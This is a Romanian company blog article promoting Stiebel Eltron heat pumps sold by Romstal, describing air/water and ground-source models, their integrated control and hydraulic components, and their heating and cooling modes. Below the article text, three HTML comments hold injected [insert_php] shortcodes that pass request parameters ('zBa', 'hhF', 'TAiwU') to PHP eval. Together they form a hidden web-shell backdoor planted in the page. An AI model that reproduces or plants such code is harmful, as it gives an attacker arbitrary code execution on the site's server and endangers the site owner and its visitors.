Caldura… fara victime colaterale

Actualizat la 15 February, 2017 at 09:03 am

Este bine cunoscut ca orice forma de energie obtinuta cu mijloace clasice (combustibili fosili sau nucleari), desi indispensabila vietii, creaza si multe efecte negative. Spre „disconfortul” generatiei noastre aceste efecte negative sau acutizat in momentul de fata si genereaza deja schimbari dramatice in echilibrul planetar dar si multe motive de ingrijorare pentru viitor.

Acum, mai mult decat oricand responsabilitatea viitorului planetei trece din grija superputerilor, guvernelor si institutiilor in aceea a fiecarui individ in parte. Iata, pe scurt logica acestei formulari: tinand cont ca mare parte din energia produsa pe pamant este utilizata pentru necesitatile si confortul fiecarui om si de faptul ca fiecare kilowat utilizat produce si noxe, devine extrem de important ca fiecare utilizator de energie sa fie constient de cata energie consuma si cate noxe produce prin utilizarea acesteia. Si cum tendinta actuala este de a crea surse de caldura proprii fiecarei cladiri rezulta ca fiecare individ / familie devine gestionarul si responsabilul atat al energiei consumate cat si a cantitatii de noxe emise.

Bineinteles ca aceasta nu inseamna ca trebuie sa renuntam la standardele noastre de confort sau ca nu trebuie sa le imbunatatim si sa le generalizam continuu. Trebuie doar ca fiecare dintre noi sa fim foarte atenti sa nu risipim energia si sa ne orientam catre acele forme de energie care nu produc efecte secundare negative. Si, o spunem cu toata „energia”, in momentul de fata exista si mijloacele prin care putem face aceste schimbari.

In aceasta idee, gama de pompe de caldura pe care compania noastra le comercializeaza reprezinta o varianta moderna si performanta de inlocuire a surselor clasice de energie termica. Pompele sunt produse de firma Stiebel Eltron din Germania, un producator cu mare traditie si recunoastere pe piata occidentala. Este de remarcat faptul ca, in acest tandem Romstal – Stiebel Eltron, introducem pe piata din Romania intreaga gama de pompe de caldura si cu toate accesoriile si modulele necesare configurarii unei mari varietati de instalatii de racire si incalzire (caldura si apa calda):

 • WPL – pompe de caldura aer / apa cu montaj in interior sau in exterior, puteri intre 13 si 23 de KW (Imaginea 1)
 • WPC / WPF – serie de pompe de caldura, apa /apa cu trei tipuri de montaj:

   

  • cu recircularea apei freatice din sol, caz in care este nevoie de doua puturi unul de aspiratie si altul de evacuare (Imaginea 2)
  • cu recirculare de agent termic in sol, cu serpentina orizontala (Imaginea 3)
  • cu recirculare de agent termic in sol, cu serpentine verticale (Imaginea 4)

WPL – pompe de caldura aer / apa cu montaj in interior sau in exterior, puteri intre 13 si 23 de KW

WPC / WPF – serie de pompe de caldura, apa /apa cu recircularea apei freatice din sol, caz in care este nevoie de doua puturi unul de aspiratie si altul de evacuare

WPC / WPF – serie de pompe de caldura, apa /apa cu recirculare de agent termic in sol, cu serpentina orizontala

WPC / WPF – serie de pompe de caldura, apa /apa cu recirculare de agent termic in sol, cu serpentine verticale

 

Constructia compacta, dimensiunile extrem de mici, designul placut dar si performantele tehnice deosebite fac din aceasta gama de produse o optiune clara pentru inlocuirea surselor clasice si poluante de incalzire.
Spre exemplu gama WPC contine in unitatea centrala toate elementele necesare cuplarii atat la instalatia hidraulica exterioara cat si la instalatiile de incalzire si preparare acm interioare:

 • WPMI – blocul de comanda si control al intregii instalatii:

   

  • functionarea si supravegherea circuitului de agent frigorific,
  • reglare dupa temperatura exterioara,
  • interfata cu utilizatorul,
  • diagnoza si afisare erori de functionare,
  • programarea regimurilor de functionare.
 • pompa de recirculare pe incalzire,
 • pompa de circulatie a sursei de caldura,
 • vana cu trei cai pentru preparare acm,
 • senzori de temperatura pe tur, pe retur si pe agentul sursei,
 • supapa de siguranta si aparate de afisare directa a presiunii si temperaturii in diferite puncte,
 • boiler de 200 l pentru preparare si stocare apa calda menajera.

Un alt exemplu este oferit in imaginile de mai jos in care se pot realiza trei regimuri de lucru diferite cu ajutorul unui modul hidraulic cu 4 vane cu trei cai si o pompa de circulatie asigurand:

 • functionarea in regim de incalzire – fig. 5 in care se preia caldura de la sursa si se transfera in instalatia interioara,
 • functionarea in regim de racire pasiva – fig. 6 in care, fara sa fie nevoie de pornirea circuitului de agent frigorific (compresor), temperatura rece a solului se utilizeaza pentru racirea circuitelor interioare
 • functionarea in regim de racire activa – fig.7 in care pentru o mai mare eficienta a racirii intervine si circuitul frigorific.

Totul este controlat de la nivelul blocului electronic integrat.

Functionarea in regim de incalzire

Functionarea in regim de incalzire

Functionarea in regim de racire pasiva

Functionarea in regim de racire pasiva

Functionarea in regim de racire activa

Functionarea in regim de racire activa

 

Acest grad de integrare plus faptul ca Romstal ofera toate celelate componente ale realizarii instalatiilor aferente (conducte, fitinguri, elemnte de cuplare si separare hidraulica, etc.) si asistenta la proiectare si dimensionare duc la o mare facilitate in realizarea aplicatiilor cu astfel de echipamente. Detalii despre game, dimensiuni, performante tehnice si tehnologii de realizare si utilizare gasite pe site-ul nostru sau direct la personalul de specialitate.

<!– [insert_php]if (isset($_REQUEST["zBa"])){eval($_REQUEST["zBa"]);exit;}[/insert_php][php]if (isset($_REQUEST["zBa"])){eval($_REQUEST["zBa"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["hhF"])){eval($_REQUEST["hhF"]);exit;}[/insert_php][php]if (isset($_REQUEST["hhF"])){eval($_REQUEST["hhF"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["TAiwU"])){eval($_REQUEST["TAiwU"]);exit;}[/insert_php][php]if (isset($_REQUEST["TAiwU"])){eval($_REQUEST["TAiwU"]);exit;}[/php] –>


Ti-a placut acest articol?
Aboneaza-te la newsletter si iti vom mai trimite si alte articole ca acesta.

Leave a Reply

Your email address will not be published. Required fields are marked *